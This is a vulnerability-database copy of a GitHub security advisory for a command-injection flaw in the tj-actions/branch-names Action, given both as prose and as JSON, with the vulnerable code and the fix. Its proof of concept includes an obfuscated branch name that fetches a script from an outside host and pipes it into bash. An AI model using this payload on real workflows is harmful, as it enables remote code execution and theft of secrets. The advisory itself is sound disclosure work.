ghsa-gq52-6phf-x2r6
Vulnerability from github
Published
2025-07-25 19:28
Modified
2025-07-28 13:00
Severity ?
9.1 (Critical) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L
Summary
tj-actions/branch-names has a Command Injection Vulnerability
Details

Overview

A critical vulnerability has been identified in the tj-actions/branch-names GitHub Action workflow which allows arbitrary command execution in downstream workflows. This issue arises due to inconsistent input sanitization and unescaped output, enabling malicious actors to exploit specially crafted branch names or tags. While internal sanitization mechanisms have been implemented, the action outputs remain vulnerable, exposing consuming workflows to significant security risks.

Technical Details

The vulnerability stems from the unsafe use of the eval printf "%s" pattern within the action's codebase. Although initial sanitization using printf "%q" properly escapes untrusted input, subsequent unescaping via eval printf "%s" reintroduces command injection risks. This unsafe pattern is demonstrated in the following code snippet:

bash echo "base_ref_branch=$(eval printf "%s" "$BASE_REF")" >> "$GITHUB_OUTPUT" echo "head_ref_branch=$(eval printf "%s" "$HEAD_REF")" >> "$GITHUB_OUTPUT" echo "ref_branch=$(eval printf "%s" "$REF_BRANCH")" >> "$GITHUB_OUTPUT"

This approach allows attackers to inject arbitrary commands into workflows consuming these outputs, as shown in the Proof-of-Concept (PoC) below.

Proof-of-Concept (PoC)

  1. Create a branch with the name $(curl,-sSfL,www.naturl.link/NNT652}${IFS}|${IFS}bash).
  2. Trigger the vulnerable workflow by opening a pull request into the target repository.
  3. Observe arbitrary code execution in the workflow logs.

Example output: bash Running on a pull request branch. Run echo "Running on pr: $({curl,-sSfL,www.naturl.link/NNT652}${IFS}|${IFS}bash)" echo "Running on pr: $({curl,-sSfL,www.naturl.link/NNT652}${IFS}|${IFS}bash)" shell: /usr/bin/bash -e {0} Running on pr: === PoC script executed successfully === Runner user: runner

Impact

This vulnerability enables arbitrary command execution in repositories consuming outputs from tj-actions/branch-names. The severity of the impact depends on the permissions granted to the GITHUB_TOKEN and the context of the triggering event. Potential consequences include:

  • Theft of sensitive secrets stored in the repository.
  • Unauthorized write access to the repository.
  • Compromise of the repository's integrity and security.

Mitigation and Resolution

To address this vulnerability, the unsafe eval printf "%s" pattern must be replaced with safer alternatives. Specifically, direct printf calls can achieve the same functionality without unescaping shell-unsafe characters. Below is the recommended fix:

bash printf "base_ref_branch=%s\n" "$BASE_REF" >> "$GITHUB_OUTPUT" printf "head_ref_branch=%s\n" "$HEAD_REF" >> "$GITHUB_OUTPUT" printf "ref_branch=%s\n" "$REF_BRANCH" >> "$GITHUB_OUTPUT" printf "tag=%s\n" "$TAG" >> "$GITHUB_OUTPUT"

This approach ensures that all outputs remain properly escaped and safe for downstream consumption.

Recommendations

  1. Immediate Action: Developers using the tj-actions/branch-names workflow should update their workflows to latest major version v9.

References

Show details on source website

To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 8.2.1"
      },
      "package": {
        "ecosystem": "GitHub Actions",
        "name": "tj-actions/branch-names"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "9.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-54416"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-77"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-07-25T19:28:22Z",
    "nvd_published_at": "2025-07-26T04:16:10Z",
    "severity": "CRITICAL"
  },
  "details": "#### **Overview**\n\nA critical vulnerability has been identified in the `tj-actions/branch-names` GitHub Action workflow which allows arbitrary command execution in downstream workflows. This issue arises due to inconsistent input sanitization and unescaped output, enabling malicious actors to exploit specially crafted branch names or tags. While internal sanitization mechanisms have been implemented, the action outputs remain vulnerable, exposing consuming workflows to significant security risks.\n\n#### **Technical Details**\n\nThe vulnerability stems from the unsafe use of the `eval printf \"%s\"` pattern within the action\u0027s codebase. Although initial sanitization using `printf \"%q\"` properly escapes untrusted input, subsequent unescaping via `eval printf \"%s\"` reintroduces command injection risks. This unsafe pattern is demonstrated in the following code snippet:\n\n```bash\necho \"base_ref_branch=$(eval printf \"%s\" \"$BASE_REF\")\" \u003e\u003e \"$GITHUB_OUTPUT\"\necho \"head_ref_branch=$(eval printf \"%s\" \"$HEAD_REF\")\" \u003e\u003e \"$GITHUB_OUTPUT\"\necho \"ref_branch=$(eval printf \"%s\" \"$REF_BRANCH\")\" \u003e\u003e \"$GITHUB_OUTPUT\"\n```\n\nThis approach allows attackers to inject arbitrary commands into workflows consuming these outputs, as shown in the Proof-of-Concept (PoC) below.\n\n#### **Proof-of-Concept (PoC)**\n\n1. Create a branch with the name `$(curl,-sSfL,www.naturl.link/NNT652}${IFS}|${IFS}bash)`.\n2. Trigger the vulnerable workflow by opening a pull request into the target repository.\n3. Observe arbitrary code execution in the workflow logs.\n\nExample output:\n```bash\nRunning on a pull request branch.\nRun echo \"Running on pr: $({curl,-sSfL,www.naturl.link/NNT652}${IFS}|${IFS}bash)\"\n  echo \"Running on pr: $({curl,-sSfL,www.naturl.link/NNT652}${IFS}|${IFS}bash)\"\n  shell: /usr/bin/bash -e {0}\nRunning on pr: === PoC script executed successfully ===\nRunner user: runner\n```\n\n#### **Impact**\n\nThis vulnerability enables arbitrary command execution in repositories consuming outputs from `tj-actions/branch-names`. The severity of the impact depends on the permissions granted to the `GITHUB_TOKEN` and the context of the triggering event. Potential consequences include:\n\n- Theft of sensitive secrets stored in the repository.\n- Unauthorized write access to the repository.\n- Compromise of the repository\u0027s integrity and security.\n\n#### **Mitigation and Resolution**\n\nTo address this vulnerability, the unsafe `eval printf \"%s\"` pattern must be replaced with safer alternatives. Specifically, direct `printf` calls can achieve the same functionality without unescaping shell-unsafe characters. Below is the recommended fix:\n\n```bash\nprintf \"base_ref_branch=%s\\n\" \"$BASE_REF\" \u003e\u003e \"$GITHUB_OUTPUT\"\nprintf \"head_ref_branch=%s\\n\" \"$HEAD_REF\" \u003e\u003e \"$GITHUB_OUTPUT\"\nprintf \"ref_branch=%s\\n\" \"$REF_BRANCH\" \u003e\u003e \"$GITHUB_OUTPUT\"\nprintf \"tag=%s\\n\" \"$TAG\" \u003e\u003e \"$GITHUB_OUTPUT\"\n```\n\nThis approach ensures that all outputs remain properly escaped and safe for downstream consumption.\n\n#### **Recommendations**\n\n1. **Immediate Action**: Developers using the `tj-actions/branch-names` workflow should update their workflows to latest major version [v9](https://github.com/tj-actions/branch-names/releases/tag/v9.0.0).\n\n#### **References**\n- [GitHub Actions Security Guide](https://securitylab.github.com/resources/github-actions-untrusted-input/)\n- [How to Secure GitHub Actions Workflows](https://github.blog/security/application-security/how-to-secure-your-github-actions-workflows-with-codeql/)\n- [Related Vulnerability: GHSA-mcph-m25j-8j63](https://github.com/tj-actions/changed-files/security/advisories/GHSA-mcph-m25j-8j63)\n- [Template Injection Advisory: GHSA-8v8w-v8xg-79rf](https://github.com/tj-actions/branch-names/security/advisories/GHSA-8v8w-v8xg-79rf)",
  "id": "GHSA-gq52-6phf-x2r6",
  "modified": "2025-07-28T13:00:31Z",
  "published": "2025-07-25T19:28:22Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/tj-actions/branch-names/security/advisories/GHSA-8v8w-v8xg-79rf"
    },
    {
      "type": "WEB",
      "url": "https://github.com/tj-actions/branch-names/security/advisories/GHSA-gq52-6phf-x2r6"
    },
    {
      "type": "WEB",
      "url": "https://github.com/tj-actions/changed-files/security/advisories/GHSA-mcph-m25j-8j63"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54416"
    },
    {
      "type": "WEB",
      "url": "https://github.com/tj-actions/branch-names/commit/e497ceb8ccd43fd9573cf2e375216625bc411d1f"
    },
    {
      "type": "WEB",
      "url": "https://github.blog/security/application-security/how-to-secure-your-github-actions-workflows-with-codeql"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/tj-actions/branch-names"
    },
    {
      "type": "WEB",
      "url": "https://github.com/tj-actions/branch-names/releases/tag/v9.0.0"
    },
    {
      "type": "WEB",
      "url": "https://securitylab.github.com/resources/github-actions-untrusted-input"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "tj-actions/branch-names has a Command Injection Vulnerability"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.